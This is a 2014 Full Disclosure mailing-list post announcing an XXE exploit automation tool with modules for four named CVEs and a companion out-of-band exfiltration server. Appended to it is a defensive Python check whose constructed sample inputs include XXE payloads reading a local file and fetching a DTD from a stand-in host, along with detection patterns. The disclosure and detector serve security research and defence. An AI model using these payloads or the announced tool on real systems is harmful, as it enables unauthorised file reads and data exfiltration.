Message-ID: <539EA9DA.5090200@beneaththewaves.net>
Date: Mon, 16 Jun 2014 01:24:58 -0700
From: "Ben Lincoln (F7EFC8C9)" <F7EFC8C9@...eaththewaves.net>
To: fulldisclosure@...lists.org
Subject: [FD] [Tool] XXE exploit automation - On The Outside, Reaching In 0.2

This has been my weekend project off and on since February. I would 
still consider it in a "preview" state, but I also think it's far enough 
along to be useful to at least a few people.

The idea behind it is to use a Metasploit-style module system 
specifically for XXE exploit code. This allows a common interface, 
including the ability to automate downloads of numerous files, or 
automatically walk the directory structure if the vulnerable system is 
based on Java.

This initial release includes a number of different modules for four 
different vulnerable software packages:

CVE-2013-6407 - Apache Solr
SOS-12-007 - Squiz Matrix prior to version 4.6.5/4.8.1
CVE-2014-2205 - McAfee ePolicy Orchestrator from 4.6.0 to 4.6.7 (without 
Hotfix 940148)
CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3

To my knowledge, this is the first public release of exploit code for 
CVE-2013-6407 and CVE-2012-2239.

The Squiz Matrix and Mahara modules make use of On The Outside, Reaching 
In's co-conspirator She Wore A Mirrored Mask, which is an extremely 
lightweight webserver that pretends to be something innocuous (Apache 
Coyote 1.1 by default), but is actually used for Yunusov-Osipov-style 
out-of-band XXE data-exfiltration.

Again, these are really early versions, and the code is a bit of a mess, 
but they do work very effectively, at least if you run them under Python 
2.7.3. The code is GPLv3.

Main pages:

http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html
http://www.beneaththewaves.net/Software/She_Wore_A_Mirrored_Mask.html

In-depth tutorials:

http://www.beneaththewaves.net/Software/OTORI_-_Example_1_Apache_Solr.html
http://www.beneaththewaves.net/Software/OTORI_-_Example_2_Squiz_Matrix.html
http://www.beneaththewaves.net/Software/OTORI_-_Example_3_Mahara.html
http://www.beneaththewaves.net/Software/OTORI_-_Example_4_McAfee_ePO.html

Feedback is appreciated, and if anyone is able to make good use of them 
in a pen-test, I'd love to hear about it.

- Ben Lincoln
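A defender-side check for the class of input described above, added here as an example and not part of OTORI or the original post: it screens an XML document's DOCTYPE for external entity declarations (the parameter-entity form being the out-of-band shape the announcement refers to) before handing the document to a parser. The sample documents are constructed, and the regular-expression screen assumes a well-formed DOCTYPE.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample inputs (not taken from the tool or the announcement).
BENIGN = '<?xml version="1.0"?><doc><item>hello</item></doc>'
INLINE_XXE = ('<?xml version="1.0"?>'
              '<!DOCTYPE doc [<!ENTITY ext SYSTEM "file:///example/local/file">]>'
              '<doc>&ext;</doc>')
OOB_XXE = ('<?xml version="1.0"?>'
           '<!DOCTYPE doc [<!ENTITY % remote SYSTEM "http://oob.example.invalid/x.dtd">%remote;]>'
           '<doc/>')

# DOCTYPE with an optional external DTD reference and an optional internal subset.
DOCTYPE_RE = re.compile(
    r'<!DOCTYPE\s+\S+(?P<ext>\s+(?:SYSTEM|PUBLIC)\b[^\[>]*)?\s*(?:\[(?P<subset>.*?)\])?\s*>',
    re.S | re.I)
# Entity declarations whose content is fetched from outside the document.
EXT_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)\b', re.I)


def assess(xml_text):
    """Return a list of findings describing external references in the DTD; [] means none."""
    findings = []
    m = DOCTYPE_RE.search(xml_text)
    if not m:
        return findings
    if m.group('ext'):
        findings.append('external DTD reference in DOCTYPE')
    for e in EXT_ENTITY_RE.finditer(m.group('subset') or ''):
        if e.group('param'):
            # A parameter entity loaded from a URL is the out-of-band exfiltration shape.
            findings.append('external parameter entity %%%s (%s): out-of-band pattern'
                            % (e.group('name'), e.group('kind').upper()))
        else:
            findings.append('external general entity %s (%s)'
                            % (e.group('name'), e.group('kind').upper()))
    return findings


def parse_safely(xml_text):
    """Refuse to parse anything whose DTD reaches outside the document."""
    findings = assess(xml_text)
    if findings:
        raise ValueError('rejected XML: ' + '; '.join(findings))
    return ET.fromstring(xml_text)


def rejects(xml_text):
    """True if parse_safely() refuses the input (helper for checks)."""
    try:
        parse_safely(xml_text)
    except ValueError:
        return True
    return False
```

The screen complements, rather than replaces, a parser configured to disallow DTDs and external entity resolution.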
